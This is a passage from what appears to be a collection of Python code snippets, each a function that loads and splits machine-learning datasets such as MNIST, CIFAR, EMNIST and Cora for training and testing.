np.random.RandomState(self.seed).shuffle(im_files) # fix the seed to keep label,unlabel fixed\n for j, im_file in enumerate(im_files):\n im = np.array(Image.open(im_file).resize((self.im_width, self.im_height)), \n np.float32, copy=False)\n if j<self.n_label:\n dataset_l[i, j] = im\n else:\n dataset_u[i,j-self.n_label] = im\n print('labeled data:', np.shape(dataset_l))\n print('unlabeled data:', np.shape(dataset_u))\n \n self.dataset_l = dataset_l\n self.dataset_u = dataset_u\n self.n_classes = n_classes", "def load_data():\n\n training_files_dir = \"digits/trainingDigits\"\n training_files = os.listdir(training_files_dir)\n file_num = len(training_files)\n hw_labels = []\n\n training_mat = zeros((file_num, 32 * 32))\n for i in xrange(file_num):\n filename = training_files[i]\n file_label = int((filename.split(\".\")[0]).split(\"_\")[0])\n hw_labels.append(file_label)\n training_mat[i, :] = img2vector(training_files_dir + '/' + filename)\n\n return training_mat, hw_labels", "def load_data():\n global batch_size, num_batches\n # import data\n data, labels = original_clean()\n test_data = data[:test_size, :]\n test_labels = labels[:test_size]\n\n data = data[test_size:, :]\n\n # make landmarks with points with most neighbors\n N = NearestNeighbors(n_neighbors=k_start).fit(data).kneighbors_graph(data).todense()\n N = np.array(N)\n num_connections = N.sum(axis=0).argsort()[::-1] # see how many neighbors each point has\n top_landmarks_idxs = num_connections[:num_lm] # sort in descending order\n land_marks = data[top_landmarks_idxs, :] # pick the top ones\n data = np.delete(data, top_landmarks_idxs, axis=0) # delete the landmarks\n # find the nearest landmarks for the landmarks\n landmark_neighbors = NearestNeighbors(n_neighbors=k_lm).fit(land_marks).kneighbors_graph(land_marks).todense()\n # break data into batches, create empty holders\n batch_loader = np.zeros((num_batches, batch_size + num_lm, n))\n batch_graph = np.zeros((num_batches, batch_size + num_lm, batch_size + num_lm))\n # create the full neighborhood graph for each batch\n for i in range(num_batches):\n holder = data[batch_size * i: batch_size * (i + 1)]\n # find the nearest landmarks for the rest of the points\n holder_graph = NearestNeighbors(n_neighbors=k_other).fit(land_marks).kneighbors_graph(holder).todense()\n for j in range(batch_size): # copy over the holder graph\n for l in range(num_lm):\n if holder_graph[j, l] == 1:\n batch_graph[i, j, l + batch_size] = 1\n batch_graph[i, l + batch_size, j] = 1\n for j in range(num_lm): # copy over landmark neighbors\n for l in range(j, num_lm):\n if landmark_neighbors[j, l] == 1 and j != l:\n batch_graph[i, j + batch_size, l + batch_size] = 1\n batch_graph[i, l + batch_size, j + batch_size] = 1\n holder = np.concatenate((holder, land_marks))\n batch_loader[i] = holder\n batch_size += num_lm # adjust the batch size\n return batch_loader, data, batch_graph, landmark_neighbors, test_data, test_labels, land_marks", "def load_CIFAR_batch(filename):\r\n with open(filename, 'rb')as f:\r\n datadict = p.load(f)\r\n \r\n X = datadict['data']\r\n Y = datadict['labels']\r\n \r\n print X.shape\r\n X = X.reshape(X.shape[0], SHAPE[0], SHAPE[1], SHAPE[2])\r\n Y = np.array(Y)\r\n return X, Y", "def load_data(path=\"data/cora/\", dataset=\"cora\"):\n print('Loading {} dataset...'.format(dataset))\n\n idx_features_labels = np.genfromtxt(\"{}{}.content\".format(path, dataset),\n dtype=np.dtype(str))\n features = sp.csr_matrix(idx_features_labels[:, 1:-1], dtype=np.float32)\n labels = encode_onehot(idx_features_labels[:, -1])\n\n n_nodes, d_edge = features.shape\n\n # build graph\n idx = np.array(idx_features_labels[:, 0], dtype=np.int32)\n idx_map = {j: i for i, j in enumerate(idx)}\n edges_unordered = np.genfromtxt(\"{}{}.cites\".format(path, dataset),\n dtype=np.int32)\n print(edges_unordered)\n edges = np.array(list(map(idx_map.get, edges_unordered.flatten())),\n dtype=np.int32).reshape(edges_unordered.shape)\n adj = sp.coo_matrix((np.ones(edges.shape[0]), (edges[:, 0], edges[:, 1])),\n shape=(labels.shape[0], labels.shape[0]),\n dtype=np.float32)\n\n # build symmetric adjacency matrix\n adj = adj + adj.T.multiply(adj.T > adj) - adj.multiply(adj.T > adj)\n\n node_features = normalize(features)\n adj = normalize(adj + sp.eye(adj.shape[0]))\n\n # Edge matrix\n edge_features = None\n is3d = False\n if(is3d):\n indices = [[], [] , []]\n values = []\n sizes = [n_nodes, n_nodes, d_edge]\n\n i, j = adj.nonzero()\n for e in range(len(i)):\n i_idx = node_features[i[e],:].nonzero()[1]\n j_idx = node_features[j[e],:].nonzero()[1]\n for ii in i_idx:\n indices[0].append(i[e])\n indices[1].append(j[e])\n indices[2].append(ii)\n if ii in j_idx:\n values.append((node_features[i[e],:][0,ii] + node_features[j[e],:][0,ii])/2)\n else:\n values.append(node_features[i[e],:][0,ii])\n for jj in j_idx:\n if jj in j_idx:\n continue\n else:\n indices[0].append(i[e])\n indices[1].append(j[e])\n indices[2].append(jj)\n values.append(node_features[j[e],:][0,jj])\n indices = torch.LongTensor(indices)\n values = torch.FloatTensor(values)\n edge_features = torch.sparse_coo_tensor(indices, values, sizes)\n else:\n indices = [[], []]\n values = []\n sizes = [n_nodes*n_nodes, d_edge]\n\n i, j = adj.nonzero()\n for e in range(len(i)):\n i_idx = node_features[i[e],:].nonzero()[1]\n j_idx = node_features[j[e],:].nonzero()[1]\n for ii in i_idx:\n indices[0].append(i[e]+n_nodes*j[e])\n indices[1].append(ii)\n if ii in j_idx:\n values.append((node_features[i[e],:][0,ii] + node_features[j[e],:][0,ii])/2)\n else:\n values.append(node_features[i[e],:][0,ii])\n for jj in j_idx:\n if jj in j_idx:\n continue\n else:\n indices[0].append(i[e]+n_nodes*j[e])\n indices[1].append(jj)\n values.append(node_features[j[e],:][0,jj])\n indices = torch.LongTensor(indices)\n values = torch.FloatTensor(values)\n edge_features = torch.sparse_coo_tensor(indices, values, sizes)\n\n idx_train = range(140)\n idx_val = range(200, 500)\n idx_test = range(500, 1500)\n\n node_features = torch.FloatTensor(np.array(node_features.todense()))\n\n labels = torch.LongTensor(np.where(labels)[1])\n adj = sparse_mx_to_torch_sparse_tensor(adj)\n\n idx_train = torch.LongTensor(idx_train)\n idx_val = torch.LongTensor(idx_val)\n idx_test = torch.LongTensor(idx_test)\n\n return adj, edge_features, node_features, labels, idx_train, idx_val, idx_test", "def readDataFromFile():\n image_size = 28 # each image is 28x28\n\n num_images = 60000 # there are 60k images\n with gzip.open(r'train-images-idx3-ubyte.gz', 'r') as f: # 60k train & valid\n f.read(16) # reading by 16-byte double\n buffer_Train_Images = f.read(image_size * image_size * num_images)\n f.close()\n data_Train_Images = np.frombuffer(buffer_Train_Images, dtype=np.uint8).astype(\n np.int32) # translating into 0 to 255\n data_Train_Images = data_Train_Images.reshape(num_images,\n image_size * image_size) # Data = 60k x 28 x 28 with 1 value in it\n\n with gzip.open('train-labels-idx1-ubyte.gz', 'r') as f: # 60k train & valid - labels\n f.read(8) # reading by 16-byte double\n buffer_Train_Labels = f.read(num_images)\n data_Train_Labels = np.frombuffer(buffer_Train_Labels, dtype=np.uint8).astype(\n np.int32) # translating into 0 to 255\n\n num_images = 10000 # there are 10k images\n with gzip.open('t10k-images-idx3-ubyte.gz', 'r') as f: # 10k tests\n f.read(16) # reading by 16-byte double\n buffer_Test_Image = f.read(image_size * image_size * num_images)\n data_Test_Image = np.frombuffer(buffer_Test_Image, dtype=np.uint8).astype(\n np.uint8) # translating into 0 to 255\n data_Test_Image = data_Test_Image.reshape(num_images, image_size * image_size) # Data = 60k x 28 x 28 with\n\n with gzip.open('t10k-labels-idx1-ubyte.gz', 'r') as f: # 10k tests - lbles\n f.read(8) # reading by 16-byte double\n buffer_Test_Label = f.read(num_images)\n data_Test_Labels = np.frombuffer(buffer_Test_Label, dtype=np.uint8).astype(\n np.int32) # translating into 0 to 255\n\n return data_Train_Images, data_Train_Labels, data_Test_Image, data_Test_Labels", "def load_data(self) -> tuple:\n self.read_path = Path(os.environ[\"DATA_PATH\"]) / \"characters\"\n self.pretrain_path = Path(os.environ[\"FONT_DATA\"]) / \"training\"\n self.dataset_builder.build_data_set()\n X_pretrain, y_pretrain, X_train, y_train, X_dev, y_dev, X_test, y_test = tuple(\n [] for l in range(8)\n )\n\n for letter in self.hebrew.letter_li:\n pretrain_images = glob(f\"{Path(self.pretrain_path/letter)}/*.jpeg\")\n train_images = glob(f'{Path(self.read_path/\"train\"/letter)}/*.jpg')\n dev_images = glob(f'{Path(self.read_path/\"dev\"/letter)}/*.jpg')\n test_images = glob(f'{Path(self.read_path/\"test\"/letter)}/*.jpg')\n\n # pretrain data\n for img in pretrain_images:\n image = cv2.imread(img)\n image = cv2.resize(image, self.img_size)\n X_pretrain.append(image)\n y_pretrain.append(self.hebrew.letter_li.index(letter))\n\n # training data\n for img in train_images:\n image = cv2.imread(img)\n image = cv2.resize(image, self.img_size)\n X_train.append(image)\n y_train.append(self.hebrew.letter_li.index(letter))\n\n # dev data\n for img in dev_images:\n image = cv2.imread(img)\n image = cv2.resize(image, self.img_size)\n X_dev.append(image)\n y_dev.append(self.hebrew.letter_li.index(letter))\n\n # test data\n for img in test_images:\n image = cv2.imread(img)\n image = cv2.resize(image, self.img_size)\n X_test.append(image)\n y_test.append(self.hebrew.letter_li.index(letter))\n\n return (\n np.array(X_pretrain),\n np.array(y_pretrain),\n np.array(X_train),\n np.array(y_train),\n np.array(X_dev),\n np.array(y_dev),\n np.array(X_test),\n np.array(y_test),\n )", "def load_theano_dataset(data_dir):\n\n import numpy as np\n import nibabel\n from sklearn.datasets.base import Bunch\n\n data_dir = data_dir\n\n # create sklearn's Bunch of data\n dataset_files = Bunch(\n func=data_dir+'bold.nii.gz',\n session_target=data_dir+'attributes.txt',\n mask=data_dir+'mask.nii.gz',\n conditions_target=data_dir+'attributes_literal.txt'\n )\n\n # fmri_data and mask are copied to break reference to the original object\n bold_img = nibabel.load(dataset_files.func)\n fmri_data = bold_img.get_data().astype(float)\n affine = bold_img.get_affine()\n y, session = np.loadtxt(dataset_files.session_target).astype(\"int\").T\n conditions = np.recfromtxt(dataset_files.conditions_target)['f0']\n mask = dataset_files.mask\n\n # ### Restrict to specified conditions\n condition_mask = np.logical_or(\n np.logical_or(\n conditions == 'ExeCtrl_5', conditions == 'ExeCtrl_0'\n ), conditions == 'Rest'\n )\n X = fmri_data[..., condition_mask]\n y = y[condition_mask]\n\n from sklearn.preprocessing import binarize\n y = binarize(y, threshold=2.0)[0]\n\n # ### Masking step\n from pymri.utils import masking\n from nibabel import Nifti1Image\n\n # Mask data\n X_img = Nifti1Image(X, affine)\n X = masking.apply_mask(X_img, mask, smoothing_fwhm=4)\n\n from sklearn.feature_selection import SelectKBest, f_classif\n\n # ### Define the dimension reduction to be used.\n # Here we use a classical univariate feature selection based on F-test,\n # namely Anova. We set the number of features to be selected to 784\n feature_selection = SelectKBest(f_classif, k=784)\n\n feature_selection.fit(X, y)\n X = feature_selection.transform(X)\n print(X.shape)\n\n # ### Splitting ###########################################################\n from sklearn.cross_validation import train_test_split\n\n # split original dataset into training phase (dataset) and validation phase\n X, X_v, y, y_v = train_test_split(\n X, y, test_size=0.5, random_state=42\n )\n\n # split validation phase into validation dataset and test dataset\n X_v, X_t, y_v, y_t = train_test_split(\n X_v, y_v, test_size=0.25, random_state=42\n )\n\n # X, y - training dataset\n # X_v, y_v - validation dataset\n # X_t, y_t - test dataset\n\n return (X, y), (X_v, y_v), (X_t, y_t)", "def load_data_and_embedding():\n\n # Load data\n df_data = pd.read_csv('../new_data/train_ids_and_labels_1400.txt',nrows=10000)\n y = df_data['class'] - 1 # class (0 ~ 18)\n X = df_data.drop(['class'], axis=1).values\n\n # Transform to binary class matrix\n y = to_categorical(y.values)\n\n # Randomly shuffle data\n np.random.seed(10)\n\n shuffle_indices = np.random.permutation(range(len(y)))\n X_shuffled = X[shuffle_indices]\n y_shuffled = y[shuffle_indices]\n\n # Split to train/test set\n # TODO: This is very crude, should use cross validation\n val_sample_index = -1 * int(0.2 * len(y))\n X_train, X_val = X_shuffled[:val_sample_index], X_shuffled[val_sample_index:]\n y_train, y_val = y_shuffled[:val_sample_index], y_shuffled[val_sample_index:]\n\n del df_data, X, y, X_shuffled, y_shuffled\n\n embedding_matrix = np.load(\"../embedding/word-embedding-200d-mc5.npy\")\n\n return X_train, y_train, X_val, y_val,embedding_matrix", "def load_data(filename):\n emnist = loadmat(filename)\n\n # Load training images and labels\n train_images_unshuffled = emnist['train_images']\n train_labels_unshuffled = emnist['train_labels']\n\n # Combine labels and training data\n combined_training = np.hstack((train_images_unshuffled, train_labels_unshuffled))\n\n # Shuffle data\n np.random.shuffle(combined_training)\n\n # Seperate into data and labels\n # Split into training and validation sets\n train_images = combined_training[:20800,:-1] / 255 # Normalize data, values are now between 0 and 1\n train_labels = combined_training[:20800,-1][...,None] # Turns back into column vector\n validation_images = combined_training[20800:,:-1] / 255 # Normalize data, values are now between 0 and 1\n validation_labels = combined_training[20800:,-1][...,None] # Turns back into column vector\n\n # Load training images and labels\n test_images = emnist['test_images'] / 255 # Normalize data, values are now between 0 and 1\n test_labels = emnist['test_labels']\n\n return train_images, train_labels, test_images, test_labels, validation_images, validation_labels", "def load_CIFAR_batch(filename):\n with open(filename, 'rb') as f:\n datadict = load_pickle(f)\n X = datadict['data']\n Y = datadict['labels']\n X = X.reshape(10000,3072)\n Y = np.array(Y)\n return X, Y", "def loadTestData():\n path = raw_input(\"Enter the path of Test Data: \")\n data = np.genfromtxt(path, delimiter=',', dtype=int)\n\n labels = data[:, -1]\n\n unwantedLabels = [4, 5, 6, 7, 8, 9]\n listToDelete = []\n for i, line in enumerate(range(len(data))):\n if labels[i] in unwantedLabels:\n listToDelete.append(i)\n\n actualData = np.delete(data, listToDelete, axis=0)\n\n # print(actualData.shape)\n # Separating the labels and data into different arrays\n actualLabels = actualData[:, -1]\n actualData = actualData[:, :-1]\n\n actualData = pre.scale(actualData)\n\n # Change the label vector to label matrix\n # If Label is 2 then it becomes [0, 1, 0]\n labelMatrix = np.zeros((actualLabels.shape[0], 4))\n for j in range(len(actualLabels)):\n if actualLabels[j] == 0:\n labelMatrix[j][0] = 1\n if actualLabels[j] == 1:\n labelMatrix[j][1] = 1\n if actualLabels[j] == 2:\n labelMatrix[j][2] = 1\n if actualLabels[j] == 3:\n labelMatrix[j][3] = 1\n\n return actualData, actualLabels", "def load_CIFAR_batch(filename):\r\n with open(filename, 'rb') as f:\r\n datadict = load_pickle(f)\r\n X = datadict['data']\r\n Y = datadict['labels']\r\n X = X.reshape(10000,3072)\r\n Y = np.array(Y)\r\n return X, Y", "def load_dataset():\n temp = gzip.open('mnist.pkl.gz')\n train, val , test = pickle.load(temp,encoding='latin1')\n temp.close()\n train_inp = [np.reshape(x, (784,1)) for x in train[0]]\n train_outp = [one_hot(y) for y in train[1]]\n training_data = zip(train_inp, train_outp)\n validation_inp = [np.reshape(x, (784, 1)) for x in val[0]]\n validation_data = zip(validation_inp, val[1])\n test_inp = [np.reshape(x, (784, 1)) for x in test[0]]\n test_data = zip(test_inp, test[1])\n return (training_data,validation_data,test_data)", "def load_data(self, training_path : str =\"data/training/mapping\"):\n\n array_badly_mapped = np.load(join(training_path, \"array_badly_mapped.npy\"))\n array_SV = np.load(join(training_path, \"array_SV.npy\"))\n\n labels_SV = np.zeros(len(array_SV))\n labels_badly_mapped= np.ones(len(array_badly_mapped))\n\n features = np.concatenate((array_SV, array_badly_mapped)).reshape((-1, 2))\n labels = np.concatenate((labels_SV, labels_badly_mapped))\n\n self.X_train, self.X_valid, self.y_train, self.y_valid = train_test_split(\n features, labels\n )", "def DataLoader(data_place):\n # Nd = []\n # Np = []\n # Nz = []\n # channel_num = []\n # images = []\n # id_labels = []\n # pose_labels = []\n\n # mycase\n # Nz = 50\n # channel_num = 3\n # images = np.load('{}/images.npy'.format(data_place))\n # id_labels = np.load('{}/ids.npy'.format(data_place))\n # pose_labels = np.load('{}/yaws.npy'.format(data_place))\n #\n # Np = int(pose_labels.max() + 1)\n # Nd = int(id_labels.max() + 1)\n #\n # return [images, id_labels, pose_labels, Nd, Np, Nz, channel_num]\n\n # mycase MultiPIE\n Nz = 50\n channel_num = 3\n image_attributes_df = pd.read_csv(data_place)\n\n Nd = int(np.max(image_attributes_df['Id'])+1)\n Np = int(np.max(image_attributes_df['pose'])+1)\n Ni = int(np.max(image_attributes_df['illum'])+1)\n\n return [image_attributes_df, Nd, Np, Ni, Nz, channel_num]", "def load_caps(batch_size = 128):\r\n def relabel_classes(class_idx):\r\n if 10 <= class_idx <= 35:\r\n return class_idx - 10\r\n return None\r\n\r\n\r\n\r\n train_ds = torchvision.datasets.EMNIST(root='./data',\r\n train=True,\r\n download=True,\r\n split = 'byclass',\r\n transform = emnist_img_transform,\r\n target_transform = relabel_classes)\r\n\r\n\r\n\r\n test_ds = torchvision.datasets.EMNIST(root='./data',\r\n train=False,\r\n download=True,\r\n split = 'byclass',\r\n transform = emnist_img_transform,\r\n target_transform = relabel_classes)\r\n\r\n # Discard unwanted characters from the background data\r\n train_ds = discard_none_targets(train_ds)\r\n test_ds = discard_none_targets(test_ds)\r\n\r\n\r\n # create data loaders and shuffle everything...\r\n train_dl = torch.utils.data.DataLoader(train_ds,\r\n batch_size=batch_size,\r\n shuffle=True)\r\n\r\n test_dl = torch.utils.data.DataLoader(test_ds,\r\n batch_size=batch_size,\r\n shuffle=True)\r\n\r\n return train_dl,test_dl", "def load_data():\n data = gzip.open(\"mnist.pkl.gz\", \"rb\")\n train_set, valid_set, test_set = cPickle.load(data)\n data.close()\n\n # Combine validation and train folds to recreate the master 60k set.\n new_images = numpy.concatenate((train_set[0], valid_set[0]))\n new_labels = numpy.concatenate((train_set[1], valid_set[1]))\n\n train_set = (new_images, new_labels)\n \n return (train_set, test_set)", "def load_data_realistic_ssl(dataset_name, data_path, label_map_path):\n logging.info('Loading data from pickle at %s.', data_path)\n train_set, validation_set, test_set = pickle.load(open(data_path, 'rb'))\n train_inputs = train_set['images']\n train_labels = train_set['labels']\n val_inputs = validation_set['images']\n val_labels = validation_set['labels']\n test_inputs = test_set['images']\n test_labels = test_set['labels']\n # Load label map that specifies which trainining labeles are available.\n train_indices = json.load(open(label_map_path, 'r'))\n train_indices = [\n int(key.encode('ascii', 'ignore')) for key in train_indices['values']\n ]\n train_indices = np.asarray(train_indices)\n\n # Select the loaded train indices, and make the rest unlabeled.\n unlabeled_mask = np.ones((train_inputs.shape[0],), dtype=np.bool)\n unlabeled_mask[train_indices] = False\n unlabeled_inputs = train_inputs[unlabeled_mask]\n unlabeled_labels = train_labels[unlabeled_mask]\n train_inputs = train_inputs[train_indices]\n train_labels = train_labels[train_indices]\n\n # Select a feature preprocessing function, depending on the dataset.\n feature_preproc_fn = ((lambda image: image)\n if dataset_name == 'cifar10' else convert_image)\n\n data = Dataset.build_from_splits(\n name=dataset_name,\n inputs_train=train_inputs,\n labels_train=train_labels,\n inputs_val=val_inputs,\n labels_val=val_labels,\n inputs_test=test_inputs,\n labels_test=test_labels,\n inputs_unlabeled=unlabeled_inputs,\n labels_unlabeled=unlabeled_labels,\n feature_preproc_fn=feature_preproc_fn)\n return data", "def load_data(path, rng, epoch, batch_size, x_,y_):\n #global x_,t_,y_,\n #global first_report2 \n #first_report2 = True\n start_time = time()\n v,p,skeleton_feature,l = load_gzip(path)\n v = v[:,:,:res_shape[2]]\n res_shape[0] = v.shape[0]\n v_new = empty(res_shape,dtype=\"uint8\")\n\n for i in xrange(v.shape[0]): #batch\n if p[i] < 10: p[i] = 100\n ofs = p[i]*ratio\n mid = v.shape[-1]/2.\n sli = None\n if ofs < mid:\n start = int(round(mid-ofs))\n end = int(round(mid+ofs))\n sli = slice(start,end)\n\n for j in xrange(v.shape[2]): #maps\n for k in xrange(v.shape[3]): #frames\n #body\n img = v[i,0,j,k]\n img = cut_img(img,5)\n img = misc.imresize(img,(h,h))\n # if j==0: img = 255-misc.imfilter(img,\"contour\")\n v_new[i,0,j,k] = img\n\n #hand\n img = v[i,1,j,k]\n img = img[sli,sli]\n img = misc.imresize(img,(h,h))\n v_new[i,1,j,k] = img\n\n vid, lbl = v_new,l\n\n #if epoch==0: print \"get in\",str(time()-start_time)[:3]+\"s\",\n # shuffle data\n ind = rng.permutation(l.shape[0])\n ind = ind[:batch_size]\n vid = vid[:,:,:,:4,:,:]\n vid, skeleton_feature, lbl = vid[ind].astype(floatX), skeleton_feature[ind].astype(floatX),lbl[ind].astype(floatX)\n #vid, skeleton_feature, lbl = vid.astype(floatX), skeleton_feature.astype(floatX),lbl.astype(floatX)\n\n # vid = vid/(255./(scaler*2.))-scaler\n #traj = traj/(255./(scaler_traj*2.))-scaler_traj\n # traj = traj/(255./5.)\n\n # Wudi already made labels start from 0\n #lbl -= 1 \n\n #if first_report2:\n # print \"data range:\",vid.min(),vid.max()\n # print \"traj range:\",skeleton_feature.min(),skeleton_feature.max()\n # print \"lbl range:\",lbl.min(),lbl.max()\n # first_report2 = False\n\n # set value\n x_.set_value(vid, borrow=True)\n #t_.set_value(skeleton_feature, borrow=True)\n y_.set_value(lbl, borrow=True)", "def _load_data(self):\n\n path_data_x = '/workspace/base-ml/data/dizzyreg/t%s_df.csv' % \\\n self.task_num\n path_data_y = '/workspace/base-ml/data/dizzyreg/label_df_t%s.csv' % self.task_num\n path_meta = '/workspace/base-ml/data/dizzyreg/meta_df_t%s.csv' % self.task_num\n path_numerical_columns = '/workspace/base-ml/data/dizzyreg/num_columns_v2.csv'\n path_nonnumerical_columns = '/workspace/base-ml/data/dizzyreg/non_num_columns_v2.csv'\n\n read_data_x = pd.read_csv(path_data_x)\n read_data_y = pd.read_csv(path_data_y)\n read_data_meta = pd.read_csv(path_meta)\n\n # Drop columns if it only contains 1 unique element\n read_data_x = pd.DataFrame(self.drop_one_elem_columns(read_data_x))\n\n num_col = pd.read_csv(path_numerical_columns)\n num_col = read_data_x.columns.isin(num_col['0'].values).nonzero()[0]\n col_idx = np.arange(read_data_x.shape[-1])\n non_num_col = np.setdiff1d(col_idx, num_col)\n\n # new_data_x = np.array(read_data_x).astype(np.float32)\n new_data_x = np.array(read_data_x)\n new_data_y = np.array(read_data_y).astype(np.float32)\n new_data_meta = np.array(read_data_meta).astype(np.float32)\n\n print(new_data_x.shape, new_data_y.shape, new_data_meta.shape)\n\n\n # Winsorize dataset\n len_feat = new_data_x.shape[-1]\n idx_list = list(num_col)\n for i in range(len_feat):\n if i in idx_list:\n cur_data = new_data_x[:, i]\n cur_data = np.array(cur_data)\n lower_p = np.percentile(cur_data, 5)\n higher_p = np.percentile(cur_data, 95)\n cur_data[cur_data < lower_p] = lower_p\n cur_data[cur_data > higher_p] = higher_p\n new_data_x[:, i] = cur_data\n\n # Make sure target data is one-hot encoded\n if new_data_y.shape[-1] == 1:\n num_class = len(np.unique(new_data_y))\n new_data_y = np.eye(num_class)[new_data_y.astype(int).reshape(-1)]\n new_data_y = new_data_y.astype('float32')\n self.orig_column_names = read_data_x.columns\n self.data_x = new_data_x # N x F\n self.data_y = new_data_y # N x C\n self.numerical_idx = num_col # list of idx\n self.non_num_idx = non_num_col # None\n\n # Calculate adjacency matrix\n self.meta_inf = new_data_meta.astype('float32') # N x 3\n if self.args.graph_type:\n self.adj = self.get_adjacency()", "def load_data(train_size=30000, random_state=0):\n print(\"Loading adult data from alibi.\")\n np.random.seed(random_state)\n\n data = alibi.datasets.fetch_adult()\n\n # mix input data\n data_perm = np.random.permutation(np.c_[data.data, data.target])\n data.data = data_perm[:, :-1]\n data.target = data_perm[:, -1]\n\n # perform train / test split\n X_train, y_train = data.data[:train_size, :], data.target[:train_size]\n X_test, y_test = data.data[train_size:, :], data.target[train_size:]\n\n return data, X_train, y_train, X_test, y_test", "def load_data(seq_length, filename, maxlen):\n data, chars, vocab_size = get_data(filename=filename, maxlen=maxlen)\n # chars is ints: ord('a') is chr(97)\n print('Data length: {} characters'.format(len(data)))\n print('Vocabulary size: {} characters'.format(vocab_size))\n\n ix_to_char = {ix: char for ix, char in enumerate(chars)}\n char_to_ix = {char: ix for ix, char in enumerate(chars)}\n xfile = os.path.join(mydir, 'X_{}_{}.bcolz'.format(seq_length, maxlen))\n yfile = os.path.join(mydir, 'y_{}_{}.bcolz'.format(seq_length, maxlen))\n if os.path.exists(xfile):\n X = bcolz.carray(rootdir=xfile, mode='r')[:]\n y = bcolz.carray(rootdir=yfile, mode='r')[:]\n print('using cached values from {}. X.shape={}, y.shape={}'.format(xfile, X.shape, y.shape))\n return X, y, vocab_size, ix_to_char\n else:\n print('no file {}'.format(xfile))\n # 6 s\n print('mapping data of len {}'.format(len(data)))\n data_mapped = np.array(list(map(char_to_ix.get, data)))\n\n nnn = int(len(data_mapped) / seq_length)\n print('nnn = {}'.format(nnn))\n\n X = np.zeros((nnn, seq_length, vocab_size), dtype=np.int16)\n y = np.zeros((nnn, seq_length, vocab_size), dtype=np.int16)\n I = np.eye(vocab_size, dtype=np.int16)\n t0 = time.time()\n for i in range(0, nnn):\n if i % 1000 == 1:\n percent_done = i / float(nnn)\n eta = (1 - percent_done) * (time.time() - t0) / percent_done / 60\n print('iteration {}: {} done. ETA {} minutes'.format(i, percent_done, eta))\n X[i] = I[data_mapped[i * seq_length:(i+1) * seq_length]]\n y[i] = I[data_mapped[i * seq_length + 1:(i+1) * seq_length + 1]]\n\n print('saving bcolz')\n bcolz.carray(X, rootdir=xfile)\n bcolz.carray(y, rootdir=yfile)\n return X, y, vocab_size, ix_to_char", "def load_letter(folder, min_num_images):\n image_files = os.listdir(folder) #返回指定的文件夹包含的文件或文件夹的名字的列表\n dataset = np.ndarray(shape=(len(image_files), image_size, image_size),dtype=np.float32) #创建一个numpy矩阵,个数为files的个数,长度为28*28,数据类型为float32\n print(folder)\n num_images = 0\n for image in image_files:\n image_file = os.path.join(folder, image) #将多个路径组合后返回,返回的是图片的路径和名字\n try:\n image_data = (imageio.imread(image_file).astype(float) - pixel_depth / 2) / pixel_depth #读取(image_file-image像素/2)/image像素作为image_data\n if image_data.shape != (image_size, image_size):\n raise Exception('Unexpected image shape: %s' % str(image_data.shape))\n dataset[num_images, :, :] = image_data #dataset中第num_images图片赋值为image_data的数据\n num_images = num_images + 1\n except (IOError, ValueError) as e:\n print('Could not read:', image_file, ':', e, '- it\\'s ok, skipping.')\n\n dataset = dataset[0:num_images, :, :] #将dataset的数据合并\n if num_images < min_num_images:\n raise Exception('Many fewer images than expected: %d < %d' % (num_images, min_num_images))\n\n print('Full dataset tensor:', dataset.shape)\n print('Mean:', np.mean(dataset)) #矩阵均值\n print('Standard deviation:', np.std(dataset)) #矩阵标准差\n return dataset #返回数据集", "def load_cifar10_data(self, data_path='data/cifar-10-batches-py',\n n_train_samples=50000, n_test_samples=10000):\n train_data = None\n train_labels = []\n\n for i in range(1, 6):\n data_dic = unpickle(data_path + '/data_batch_{}'.format(i))\n if i == 1:\n train_data = data_dic['data']\n else:\n train_data = np.vstack((train_data, data_dic['data']))\n\n train_labels += data_dic['labels']\n\n test_data_dic = unpickle(data_path + '/test_batch')\n test_data = test_data_dic['data']\n test_labels = test_data_dic['labels']\n\n train_data = train_data.reshape((len(train_data),\n self.LOADED_IMG_DEPTH,\n self.LOADED_IMG_HEIGHT,\n self.LOADED_IMG_HEIGHT))\n\n train_data = np.rollaxis(train_data, 1, 4)\n train_labels = np.array(train_labels)\n\n test_data = test_data.reshape((len(test_data),\n self.LOADED_IMG_DEPTH,\n self.LOADED_IMG_HEIGHT,\n self.LOADED_IMG_HEIGHT))\n\n test_data = np.rollaxis(test_data, 1, 4)\n test_labels = np.array(test_labels)\n\n self.train_dataset = {'data': train_data[0:n_train_samples],\n 'labels': train_labels[0:n_train_samples],\n 'cls': [np.zeros(10)\n for i in range(n_train_samples)]}\n\n for i in range(0, n_train_samples):\n self.train_dataset['cls'][i][self.train_dataset['labels'][i]] = 1.\n\n self.test_dataset = {'data': test_data[0:n_test_samples],\n 'labels': test_labels[0:n_test_samples],\n 'cls': [np.zeros(10)\n for i in range(n_train_samples)]}\n\n for i in range(0, n_test_samples):\n self.test_dataset['cls'][i][self.test_dataset['labels'][i]] = 1.\n\n self.train_dataset['data_array'] = np.array(\n [item.flatten() for item in self.train_dataset['data']])\n\n self.train_dataset['labels_array'] = np.array(\n [item.flatten() for item in self.train_dataset['labels']])\n\n self.train_dataset['cls_array'] = np.array(\n [item.flatten() for item in self.train_dataset['cls']])\n\n self.test_dataset['data_array'] = np.array(\n [item.flatten() for item in self.test_dataset['data']])\n\n self.test_dataset['labels_array'] = np.array(\n [item.flatten() for item in self.test_dataset['labels']])\n\n self.test_dataset['cls_array'] = np.array(\n [item.flatten() for item in self.test_dataset['cls']])\n\n return None", "def _load_data(self, imagepath):\n im = cv2.imread(imagepath)\n self.net.blobs['data'].data[...] = self.transformer.preprocess('data', im)", "def load_data():\n\n \"\"\"The ``training_data`` is returned as a tuple with two entries.\n The first entry contains the actual training images. This is a\n numpy ndarray with 50,000 entries. Each entry is, in turn, a\n numpy ndarray with 784 values, representing the 28 * 28 = 784\n pixels in a single MNIST image.\"\"\"\n\n \"\"\"The second entry in the ``training_data`` tuple is a numpy ndarray\n containing 50,000 entries. Those entries are just the digit\n values (0...9) for the corresponding images contained in the first\n entry of the tuple.\"\"\"\n\n \"\"\"The ``validation_data`` and ``test_data`` are similar, except\n each contains only 10,000 images.\"\"\"\n f = gzip.open('MNIST/data/mnist.pkl.gz', 'rb')\n training_data, validation_data, test_data = Pickle.load(f, encoding='bytes'\n )\n f.close()\n return (training_data, validation_data, test_data)", "def LoadBatch(filename):", "def load_cifar100_dataset(dirname, labels='fine', transpose_permutation=(0,2,3,1)):\n \n #Verify paths exists for training and testing set\n if not os.path.exists(dirname):\n raise IOError, \"Cannot find path %s\" % dirname\n \n if labels not in ['fine', 'coarse']:\n raise AttributeError, \"Labels argument must be set to 'coarse' or 'fine'\"\n \n if len(set(transpose_permutation)) != 4:\n raise 